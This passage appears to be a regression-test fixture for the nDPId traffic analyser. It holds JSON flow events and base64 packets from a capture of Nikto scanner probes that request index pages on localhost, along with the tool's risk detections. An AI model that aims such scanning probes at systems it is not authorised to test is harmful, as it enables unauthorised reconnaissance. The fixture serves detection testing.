-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276819,"flow_last_seen":1576420276819,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1576420276819,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276819,"pkt":"AAAAAAAAAAAAAAAACABFAADFj3JAAEAGrL5\/AAABfwAAAcJOH5DAfLdF0MycV4AYAED+uQAAAQEICp1m+3udZvt7R0VUIC9pbmRleC5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276819,"flow_last_seen":1576420276819,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49742,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276820,"flow_last_seen":1576420276820,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276820,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1576420276820,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276820,"pkt":"AAAAAAAAAAAAAAAACABFAADG77xAAEAGTHN\/AAABfwAAAcJQH5DIa9eQqgE4nYAYAED+ugAAAQEICp1m+3ydZvt8R0VUIC9pbmRleC5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276820,"flow_last_seen":1576420276820,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276820,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49744,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276821,"flow_last_seen":1576420276821,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1576420276821,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276821,"pkt":"AAAAAAAAAAAAAAAACABFAADHQ2dAAEAG+Md\/AAABfwAAAcJSH5BEZHtRsCeOn4AYAED+uwAAAQEICp1m+32dZvt9R0VUIC9pbmRleC5hc3B4IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCg0K"} -01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":102,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276821,"flow_last_seen":1576420276821,"flow_idle_time":7440000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276821,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49746,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276823,"flow_last_seen":1576420276823,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276823,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1576420276823,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276823,"pkt":"AAAAAAAAAAAAAAAACABFAADI9WNAAEAGRsp\/AAABfwAAAcJUH5Atl81VKdEVGoAYAED+vAAAAQEICp1m+3+dZvt\/R0VUIC9kZWZhdWx0LmFzcCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":103,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276823,"flow_last_seen":1576420276823,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276823,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49748,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.asp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276824,"flow_last_seen":1576420276824,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1576420276824,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":215,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":215,"pkt_l4_len":181,"thread_ts_msec":1576420276824,"pkt":"AAAAAAAAAAAAAAAACABFAADJPphAAEAG\/ZR\/AAABfwAAAcJWH5C0BwahLC3FVoAYAED+vQAAAQEICp1m+4CdZvuAR0VUIC9kZWZhdWx0LmFzcHggSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KDQo="} -01066{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":104,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276824,"flow_last_seen":1576420276824,"flow_idle_time":7440000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420276824,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49750,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.aspx","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276825,"flow_last_seen":1576420276825,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276825,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1576420276825,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276825,"pkt":"AAAAAAAAAAAAAAAACABFAADIFrxAAEAGJXJ\/AAABfwAAAcJYH5C2Ei6NIzroBYAYAED+vAAAAQEICp1m+4GdZvuBR0VUIC9kZWZhdWx0Lmh0bSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":105,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276825,"flow_last_seen":1576420276825,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276825,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49752,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/default.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276827,"flow_last_seen":1576420276827,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1576420276827,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276827,"pkt":"AAAAAAAAAAAAAAAACABFAADFTUVAAEAG7ut\/AAABfwAAAcJaH5CLBXV23SQCI4AYAED+uQAAAQEICp1m+4OdZvuDR0VUIC9pbmRleC5kbyBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":106,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276827,"flow_last_seen":1576420276827,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276827,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49754,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.do","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276828,"flow_last_seen":1576420276828,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1576420276828,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276828,"pkt":"AAAAAAAAAAAAAAAACABFAADICi9AAEAGMf9\/AAABfwAAAcJcH5By6zIbQafp54AYAED+vAAAAQEICp1m+4SdZvuER0VUIC9pbmRleC5qaHRtbCBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":107,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276828,"flow_last_seen":1576420276828,"flow_idle_time":7440000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276828,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49756,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.jhtml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276829,"flow_last_seen":1576420276829,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1576420276829,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276829,"pkt":"AAAAAAAAAAAAAAAACABFAADG08RAAEAGaGt\/AAABfwAAAcJeH5AOKuv2Y8ch84AYAED+ugAAAQEICp1m+4WdZvuFR0VUIC9pbmRleC5qc3AgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KDQo="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276829,"flow_last_seen":1576420276829,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276829,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49758,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.jsp","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276832,"flow_last_seen":1576420276832,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49760,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1576420276832,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276832,"pkt":"AAAAAAAAAAAAAAAACABFAADGiDJAAEAGs\/1\/AAABfwAAAcJgH5Cj8LAJpHctpoAYAED+ugAAAQEICp1m+4edZvuHR0VUIC9pbmRleC54bWwgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":109,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276832,"flow_last_seen":1576420276832,"flow_idle_time":7440000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276832,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49760,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.xml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276834,"flow_last_seen":1576420276834,"flow_idle_time":7440000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420276834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49764,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1576420276834,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":240,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":240,"pkt_l4_len":206,"thread_ts_msec":1576420276834,"pkt":"AAAAAAAAAAAAAAAACABFAADiGX1AAEAGIpd\/AAABfwAAAcJkH5BjVCFE0UHCd4AYAED+1gAAAQEICp1m+4qdZvuKR0VUIC9pbmRleCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om5lZ290aWF0ZSkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdDogYXBwbGljYXRpb24vd2hhdGV2ZXI7IHE9MS4wDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":110,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276834,"flow_last_seen":1576420276834,"flow_idle_time":7440000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420276834,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49764,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) 